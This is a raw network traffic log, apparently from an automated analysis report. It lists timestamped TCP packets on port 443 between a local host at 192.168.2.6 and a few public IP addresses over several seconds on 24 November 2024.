                                                                                                                                                                                              Nov 24, 2024 13:39:59.238142967 CET49887443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.238461971 CET49887443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.238473892 CET4434988713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.270704985 CET4434987813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.273958921 CET4434987813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.274018049 CET49878443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.274560928 CET49878443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.274578094 CET4434987813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.274591923 CET49878443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.274599075 CET4434987813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.282720089 CET49888443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.282749891 CET4434988813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.282881021 CET49888443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.283051014 CET49888443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.283062935 CET4434988813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.432713985 CET443498734.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.432737112 CET443498734.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.432760000 CET443498734.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.432816029 CET49873443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:59.432840109 CET443498734.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.432881117 CET49873443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:59.470343113 CET443498734.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.470387936 CET443498734.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.470431089 CET49873443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:59.470448971 CET443498734.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.470460892 CET443498734.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.470462084 CET49873443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:59.470508099 CET49873443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:59.470645905 CET49873443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:59.470660925 CET443498734.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.470670938 CET49873443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:59.470675945 CET443498734.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.506587029 CET49889443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:39:59.506653070 CET4434988920.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.506817102 CET49889443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:39:59.507402897 CET49889443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:39:59.507424116 CET4434988920.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:00.792484045 CET4434988213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:00.794424057 CET49882443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:00.794467926 CET4434988213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:00.794931889 CET49882443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:00.794946909 CET4434988213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:00.797281027 CET4434988313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:00.798223972 CET49883443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:00.798242092 CET4434988313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:00.798660040 CET49883443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:00.798666000 CET4434988313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:00.864660978 CET4434988413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:00.865130901 CET49884443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:00.865170002 CET4434988413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:00.865583897 CET49884443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:00.865590096 CET4434988413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.061686039 CET4434988813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.062239885 CET49888443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.062263966 CET4434988813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.062756062 CET49888443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.062762976 CET4434988813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.091273069 CET4434988713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.099612951 CET49887443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.099633932 CET4434988713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.100116014 CET49887443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.100121975 CET4434988713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.227138996 CET4434988213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.230115891 CET4434988313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.230252981 CET4434988213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.230431080 CET49882443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.230900049 CET49882443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.230928898 CET4434988213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.230946064 CET49882443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.230953932 CET4434988213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.233530045 CET4434988313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.233577967 CET49883443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.234771967 CET49883443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.234791994 CET4434988313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.237276077 CET49892443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.237315893 CET4434989213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.237405062 CET49892443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.238569975 CET49892443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.238579035 CET4434989213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.241353035 CET49893443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.241400957 CET4434989313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.241467953 CET49893443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.241767883 CET49893443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.241784096 CET4434989313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.298939943 CET4434988413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.301939964 CET4434988413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.302015066 CET49884443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.304013968 CET49884443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.304028988 CET4434988413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.309573889 CET49894443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.309637070 CET4434989413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.309711933 CET49894443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.312172890 CET49894443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.312201977 CET4434989413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.539134026 CET4434988813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.540261030 CET4434988813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.540350914 CET49888443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.551790953 CET49888443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.551825047 CET4434988813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.551851034 CET49888443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.551858902 CET4434988813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.580308914 CET4434988713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.580337048 CET4434988713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.580389023 CET4434988713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.580440998 CET49887443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.580490112 CET49887443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.594973087 CET49887443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.594990969 CET4434988713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.595007896 CET49887443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.595015049 CET4434988713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.629121065 CET49895443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.629158020 CET4434989513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.629226923 CET49895443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.655457973 CET49895443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.655494928 CET4434989513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.657382965 CET49896443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.657401085 CET4434989613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.657470942 CET49896443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.657668114 CET49896443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:01.657681942 CET4434989613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.796863079 CET4434988920.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.796988964 CET49889443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:40:01.798913002 CET49889443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:40:01.798921108 CET4434988920.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.799251080 CET4434988920.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.801131964 CET49889443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:40:01.801182985 CET49889443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:40:01.801189899 CET4434988920.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:01.801347971 CET49889443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:40:01.847328901 CET4434988920.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:02.351905107 CET4434988920.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:02.352139950 CET4434988920.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:02.352202892 CET49889443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:40:02.352397919 CET49889443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:40:02.352428913 CET4434988920.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:02.955184937 CET4434989313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:02.955785036 CET49893443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:02.955802917 CET4434989313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:02.956351042 CET49893443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:02.956370115 CET4434989313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.034132957 CET4434989413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.038398981 CET49894443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.038438082 CET4434989413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.038892984 CET49894443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.038899899 CET4434989413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.081507921 CET4434989213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.082365990 CET49892443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.082381010 CET4434989213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.082854986 CET49892443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.082860947 CET4434989213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.390084982 CET4434989313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.393199921 CET4434989313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.393374920 CET49893443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.393376112 CET49893443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.393376112 CET49893443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.396358013 CET49898443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.396434069 CET4434989813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.396534920 CET49898443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.396678925 CET49898443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.396708965 CET4434989813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.441426039 CET4434989513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.445756912 CET49895443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.445781946 CET4434989513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.446299076 CET49895443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.446305037 CET4434989513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.467022896 CET4434989413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.470032930 CET4434989413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.473928928 CET49894443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.473998070 CET49894443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.474021912 CET4434989413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.474036932 CET49894443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.474045038 CET4434989413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.476932049 CET49899443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.476970911 CET4434989913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.477051020 CET49899443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.477205038 CET49899443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.477219105 CET4434989913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.508514881 CET4434989613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.510365009 CET49896443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.510401964 CET4434989613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.510932922 CET49896443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.510943890 CET4434989613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.534645081 CET4434989213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.538389921 CET4434989213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.538508892 CET4434989213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.538575888 CET49892443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.538624048 CET49892443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.538641930 CET4434989213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.538655996 CET49892443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.538662910 CET4434989213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.542152882 CET49900443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.542191982 CET4434990013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.542280912 CET49900443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.542442083 CET49900443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.542454004 CET4434990013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.696712017 CET49893443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.696727991 CET4434989313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.890471935 CET4434989513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.893570900 CET4434989513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.893640041 CET49895443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.893718004 CET49895443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.893729925 CET4434989513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.893739939 CET49895443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.893745899 CET4434989513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.897275925 CET49901443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.897316933 CET4434990113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.897407055 CET49901443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.897607088 CET49901443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.897618055 CET4434990113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.966315985 CET4434989613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.969484091 CET4434989613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.969546080 CET4434989613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.969609022 CET49896443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.969661951 CET49896443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.969728947 CET49896443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.969754934 CET4434989613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.969779015 CET49896443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.969790936 CET4434989613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.973490953 CET49902443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.973520041 CET4434990213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:03.973608017 CET49902443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.973814964 CET49902443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:03.973829031 CET4434990213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.122288942 CET4434989813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.124943018 CET49898443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.125008106 CET4434989813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.125463963 CET49898443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.125478029 CET4434989813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.270617008 CET4434989913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.271357059 CET49899443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.271426916 CET4434989913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.271886110 CET49899443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.271889925 CET4434989913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.274461985 CET4434990013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.274946928 CET49900443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.274971962 CET4434990013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.275527000 CET49900443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.275531054 CET4434990013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.561424017 CET4434989813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.564573050 CET4434989813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.565915108 CET49898443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.565963030 CET49898443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.565963030 CET49898443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.565982103 CET4434989813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.565990925 CET4434989813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.568978071 CET49903443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.568999052 CET4434990313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.569081068 CET49903443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.569247961 CET49903443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.569257975 CET4434990313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.632306099 CET4434990113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.634341002 CET49901443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.634346962 CET4434990113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.634856939 CET49901443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.634860992 CET4434990113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.710211039 CET4434990013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.713471889 CET4434990013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.713511944 CET4434989913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.713587999 CET49900443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.714998007 CET49900443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.714998007 CET49900443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.715013027 CET4434990013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.715022087 CET4434990013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.716464996 CET4434990213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.716659069 CET4434989913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.716730118 CET49899443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.717286110 CET49902443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.717294931 CET4434990213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.717979908 CET49899443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.717998028 CET4434989913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.718008041 CET49899443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.718014002 CET4434989913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.718192101 CET49902443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.718195915 CET4434990213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.719794989 CET49904443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.719820023 CET4434990413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.719902039 CET49904443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.720861912 CET49904443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.720874071 CET4434990413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.721846104 CET49905443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.721904039 CET4434990513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:05.721982956 CET49905443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.722107887 CET49905443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:05.722140074 CET4434990513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:06.134403944 CET4434990113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:06.137504101 CET4434990113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:06.137583017 CET49901443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:06.137600899 CET4434990113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:06.137620926 CET4434990113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:06.137685061 CET49901443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:06.137731075 CET49901443192.168.2.613.107.246.63
